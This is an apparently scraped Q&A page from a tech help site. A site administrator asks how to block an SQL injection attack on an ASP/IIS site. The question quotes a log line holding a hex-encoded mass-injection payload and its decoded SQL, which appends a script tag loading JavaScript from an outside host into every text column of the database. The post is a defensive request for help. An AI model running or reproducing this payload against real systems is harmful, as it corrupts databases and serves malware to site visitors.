November 19, 2008 12:53am pst

1. meverest 476,106
2. tedbilly 291,338
3. Dave_Dietz 172,244
4. RubalJ 125,188
5. TechSoEasy 94,550
6. pcsmitpra 64,215
7. Abs_jaipur 62,223
8. cj_1969 57,832
9. tigermatt 57,275
10. Chris-Dent 54,465
11. Robbie_L... 52,574
12. hielo 51,285
13. Sembee 49,488
14. LeeDerby... 47,578
15. zephyr_hex 38,555
16. RobWill 37,947
17. harperse 37,315
18. kieran_b 29,759
19. Paranorm... 29,100
20. b0lsc0tt 28,900
21. pcfreaker 28,280
22. brwwiggins 28,250
23. Redwulf... 26,850
24. LegendZM 26,575
25. Pugglewu... 23,740

1. meverest 1,590,798
2. Dave_Dietz 1,573,622
3. tedbilly 379,906
4. humeniuk 244,493
5. Sembee 222,808
6. Chris-Dent 186,082
7. TechSoEasy 179,144
8. dnojcd 167,736
9. DireOrbAnt 155,014
10. harperse 147,483
11. alimu 147,067
12. AndresM 142,147
13. cj_1969 126,771
14. RubalJ 125,688
15. Silvers5 118,933
16. Wadski 102,570
17. fz2hqs 98,692
18. pcsmitpra 92,083
19. amit_g 86,791
20. Robbie_L... 81,824
21. Abs_jaipur 80,848
22. LeeDerby... 76,253
23. shambhus... 73,800
24. bigbillydot... 73,647
25. Tacobell777 72,581

06.30.2008 at 10:06AM PDT, ID: 23527582

	[x] Attachment Details

[x]

The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

The Grade of the Solution
The Zone Rank of the Expert Providing the Solution
The Number of Author and Expert Comments
The Number of Experts Contributing
The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!

8.1

Blocking a sql injection attack in ASP

Asked by bcconner in Microsoft IIS Web Server, Miscellaneous Security, SQL Server 2005

Tags: Microsoft, SQL Server/IIS, 2000 / 5.0, sql injection attack

Hi,

One of the sites we host in IIS has a SQL Server database. I have been getting attacked by a group who inserts scripts into the character fields. I wrote a routine to strip them out, but wasn't able to find how they were doing this until now. Here's a sample of the log file for how they are doing it. The site name was intentionally blocked.

2008-06-21 16:26:01 189.5.213.241 - W3SVC14 IIS 10.0.6.1 80 GET /ViewPage.asp did=65;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E626E726164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 200 0 0 1421 609 HTTP/1.1 www.abcdef.com Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - -

If you take the hex code they are passing along and translate it, you get:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sys
objects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.x
type=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UP
DATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bnradw.com/b.js
></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I have to give them credit, this was rather clever. This particular ASP page doesn't have any forms on it. It just generates pages from the database.

Any suggestions on how to shut these folks down? I blocked the IP addresses at the router to buy time, but I'm sure they will find other ways to get here.

Environment: Windows 2000 AS, IIS 5.0, SQL Server 2000.

Thanks much!

--BenStart Free Trial

Keywords: Blocking a sql injection attack in ASP

	Title
1	Dynamic SQL / Stored Procedure and…
2	banner82 sql injection
3	Long SQL Injection
4	Irregular behavior of @@Fetch_Status
5	sql script injection
6	SQL injection protection

Loading Advertisement...

20080716-EE-VQP-32 / EE_QW_2_20070628

Blocking a sql injection attack in ASP

Asked by bcconner in Microsoft IIS Web Server, Miscellaneous Security, SQL Server 2005

Tags: Microsoft, SQL Server/IIS, 2000 / 5.0, sql injection attack

About this solution